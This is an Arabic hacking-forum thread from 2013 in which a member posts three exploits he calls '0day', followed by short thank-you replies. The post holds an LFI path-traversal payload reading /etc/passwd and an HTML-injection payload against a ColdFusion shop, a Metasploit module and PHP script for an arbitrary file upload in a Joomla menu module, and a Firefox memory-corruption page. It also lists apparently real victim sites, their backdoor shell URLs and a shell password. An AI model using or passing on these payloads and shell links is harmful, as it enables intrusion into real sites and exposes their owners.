1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

لعيونكم ثلاث ثغرات 0day

الموضوع في '[ الـثـغـرات ]' بواسطة سلطان القلوب, بتاريخ ‏24 مارس 2013.

كاتب الموضوع : سلطان القلوب المشاهدات : 2,540 الردود : 4 ‏24 مارس 2013
حالة الموضوع:
مغلق
  1. غير متصل

    سلطان القلوب
    rank
    DeveloPer Plus

    عضو منذ:
    ‏2 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    [​IMG]


    اخواني الكرام كيف حالك ان شاء الله بخير تكونو ياربي


    اليوم اضع بين ايديكم 3 ثغرات 0day


    للتنويه هذه الثغرات 0day يعني ما حد يعرف بيها وبالتالي ليست مرقعه وهذا التعريف لبعض السائلين *:"


    طبعآ الثغرات من تجميعة المبدع The Injector


    الثغرة الاولى : (( ColdFusion E-Commerce (SHOP) <= Local File Include Vulnerability ))


    كود PHP:
    ColdFusion E-Commerce (SHOP) <= Local File Include Vulnerability
    1
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
    0 _ __ __ __ 1
    /' \ __ /'__`\ /\ \__ /'__`\ 0
    /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
    0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
    1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
    0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
    1 \ \____/ >> Exploit database separated by exploit 0
    0 \/___/ type (local, remote, DoS, etc.) 1
    1 1
    0 [+] Site : 1337day.com 0
    1 [+] Support e-mail : submit[at]1337day.com 1
    0 0
    1 ######################################### 1
    0 I'm KedAns-Dz member from Inj3ct0r Team 1
    1 ######################################### 0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

    ###
    # Title : ColdFusion E-Commerce (SHOP) <= Multiple Vulnerabilities
    # Author : KedAns-Dz
    # E-mail : ked-h (@hotmail.com / @1337day.com)
    # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
    # Web Site : www.1337day.com .net .org
    # FaCeb0ok : http://fb.me/Inj3ct0rK3d
    # TwiTter : @kedans
    # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
    # Platform/CatID : remote - Multiple
    # Type : proof of concept - webapp 0day - remote
    # Tested on : Windows7
    # Download : [http://www.adobe.com/products/coldfusion-family.html]
    ###

    # <3 <3 Greetings t0 Palestine <3 <3
    # F-ck HaCking, Lov3 Explo8ting !

    ######## [ Proof / Exploit ] ################|=>

    ##################
    # [!] Description:
    ------------------
    Adobe ColdFusion suffer from multiple vulnerabilities / bugs in 
    ColdFusion-SHOP , the attacker can use some bug in the software 
    to inject some remote command/code ( LFI / HTML Injection ).
    #########

    ####> (1) LFI (Local file Include) :
    -----------------------------
    * the bug in Function ' view= ' :
    * [ex:] => [target]/[cfshop-path]/default.cfm?view= [ + LFI + ]

    * [ + LFI + ] => ../../../../../../../../../../../../../../../../../../../../../etc/passwd%00.jpg

    [+] LFI Exploit ( Demo ):=>
    http://shop.mbc.net/default.cfm?refp.../passwd%00.jpg
    http://shop.mbc.net/default.cfm?view.../passwd%00.jpg

    proof image : (http://i49.tinypic.com/23vlr9e.png)

    ####> (2) HTML Injection :
    -------------------
    * the bug in Function ' searchkey= '
    * [ex:] : &searchkey= [ HTML Code ]

    * [ HTML Code ] ex:=> "><h1><center>HaCked By KedAns-Dz</h1>

    [+] Demo : 
    http://www.citrusstv.com/shop/defaul...ns-Dz%3C/h1%3E
    http://www.citrusstv.com/shop/defaul...3C%2Fscript%3E

    proof image : (http://i49.tinypic.com/f37uvl.png)

    ########################

    # Sp.ThanX 2 : Yahya Pain & Evil-Dz , 

    #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
    # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
    # Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
    # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
    # Inj3ct0r Members 31337 : KedAns  * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
    # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Zx * HD Moore * YMCMB ..all
    # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
    # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
    #================================================= ================================================== =========

    1337day.com [2013-01-26]
    الثغرة الثانيه : (( joomla mega menu file upload ))

    كود PHP:
    #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
    #        _                                 __              __      __                                    #
    #   /' \                        __  /'__`\              /\ \__  /'__`\                             #
    #  /\_, \       ___   /\_\/\_\ \ \      ___\ \ ,_\/\ \/\ \  _ ___                  #
    #  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\             #
    #        \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            #
    #         \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            #
    #          \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            #
    #                                 \ \____/ >> Exploit database separated by exploit   #
    #                                  \/___/                 type (local, remote, DoS, etc.)       #
    #                                                                                                                                         #
    #  [+] Site                     : 1337day.com                                                              #
    #  [+] Support e-mail  : submit[at]1337day.com                                           #
    #                                                                                                                                         #
    #                          #########################################                      #
    #                          I'm The Black Devils member from Inj3ct0r Team                #
    #                          #########################################                      #
    #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-#
    ##
    # This Exploit must be use in Metasploit Framework
    # http://metasploit.com/framework/
    # This module created by The Black Devils
    ##

    require 'msf/core'
    require 'msf/core/exploit/php_exe'

    class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::PhpEXE

    def initialize(info = {})
    super(update_info(info,
    'Name'             => ' joomla! megamenu module 'uploadify.php' Arbitrary File Upload Vulnerability',
    'Description'   => %q{
    This module exploits a vulnerability found in joomla module
    By abusing the image.php file, a malicious user can upload a file to a
    temp directory without authentication, which results in arbitrary code execution.
    },
    'Author'                 =>
    [
    'The Black Devils', # initial discovery
    ],
    'License'               => MSF_LICENSE,
    'References'     =>
    [
    [ 'OSVDB', '82656' ],

    ],
    'Payload'               =>
    {
    'BadChars' => "\x00",
    },
    'Platform'         => 'php',
    'Arch'             => ARCH_PHP,
    'Targets'               =>
    [
    [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
    [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
    ],
    'DefaultTarget'  => 0,
    'DisclosureDate' => 'Mar 26 2012'))

    register_options(
    [
    OptString.new('TARGETURI', [true, 'The full URI path to joomla', '/joomla'])
    ], self.class)
    end

    def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
    'method' => 'GET',
    'uri'   => "#{uri}modules/megamenu/uploadify/uploadify.php"
    })

    if not res or res.code != 200
    return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
    end

    def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}modules/megamenu/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
    'method' => 'POST',
    'uri'   => "#{uri}modules/megamenu/uploadify/uploadify.php",
    'ctype'  => "multipart/form-data; boundary=#{data.bound}",
    'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
    fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
    'uri'   => upload_uri,
    'method' => 'GET'
    })
    end
    end

    #------------Arbitrary File Upload Vulnerability------
    <?php
    $uploadfile
    ="cyber.php.gif";
    $ch curl_init("http://localhost/modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/");
    curl_setopt($chCURLOPT_POSTtrue);
    curl_setopt($chCURLOPT_POSTFIELDS,
    array(
    'Filedata'=>"@$uploadfile"));
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
    $postResult curl_exec($ch);
    curl_close($ch);
    print 
    "$postResult";
    ?>
    Shell Access : http://localhost/modules/megamenu/uploadify/cyber.php.gif
    <?php
    phpinfo
    ();
    ?>
    #------------------
    DEMO
    http://www.produits-corses.fr/modules/megamenu-/uploadify/uploadify.php
    http://enayar.fr/modules/megamenu/uploadify/uploadify.php
    http://www.satisfaction-gsm.com/modules/megamenu/uploadify/uploadify.php
    http://prestashop.kyrnova.com/modules/megamenu-/uploadify/uploadify.php

    shell
    http://www.produits-corses.fr/modules/megamenu/uploadify//cyber.php
    pass:oeb1590

    # 6C3109D932754DAC   1337day.com [2013-01-09]   3E4098CEC9DB5A5A #

    الثغرة الثالثه : (( mozilla firefox corruption memory ))

    كود PHP:
    -->
     
    <
    html>
    <
    head>
    <
    title>Memory Corruption bY KedAns-Dz</title>
    <**** 
    onload="**********:KedAns();">
    <
    script ********="**********">
    function 
    KedAns()
    {
     
    // (puf) it's just for make a buffer and Crash !
    // some shellcode's work with this proof of concept, maybe can able to Corrupt* the MEM and Exec remote codes
    var puf =unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
     
    ********.
    write(puf); // Buffer1
     
    var buffer '\x41\x42\x43' // ABC buffer
    for(i=0<= 999 ; ++i)
    {
    buffer+=buffer+buffer
    ********.write(buffer); // Corrupt this !!!
     
    }
     
    // [ Memory Corruption !! (*__^) ]
     

    </
    script>
    </
    head>
    <
    /****>
    </html>
    <!--


    ايضآ تم ارفاق الثغرات


    :{12}:​
     

    الملفات المرفقة:



    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    X-1
    rankrank
    Developer

    عضو منذ:
    ‏10 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: لعيونكم ثلاث ثغرات 0day

    سلام عليكم ورحمة الله وبركاته
    جزاك الله الف خير
     


  4. غير متصل

    Norilkon
    rankrank
    Developer

    عضو منذ:
    ‏8 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: لعيونكم ثلاث ثغرات 0day

    الله يعطيك الف عآفية
     


  5. غير متصل

    Norilkon
    rankrank
    Developer

    عضو منذ:
    ‏8 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: لعيونكم ثلاث ثغرات 0day

    تم التقيم
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...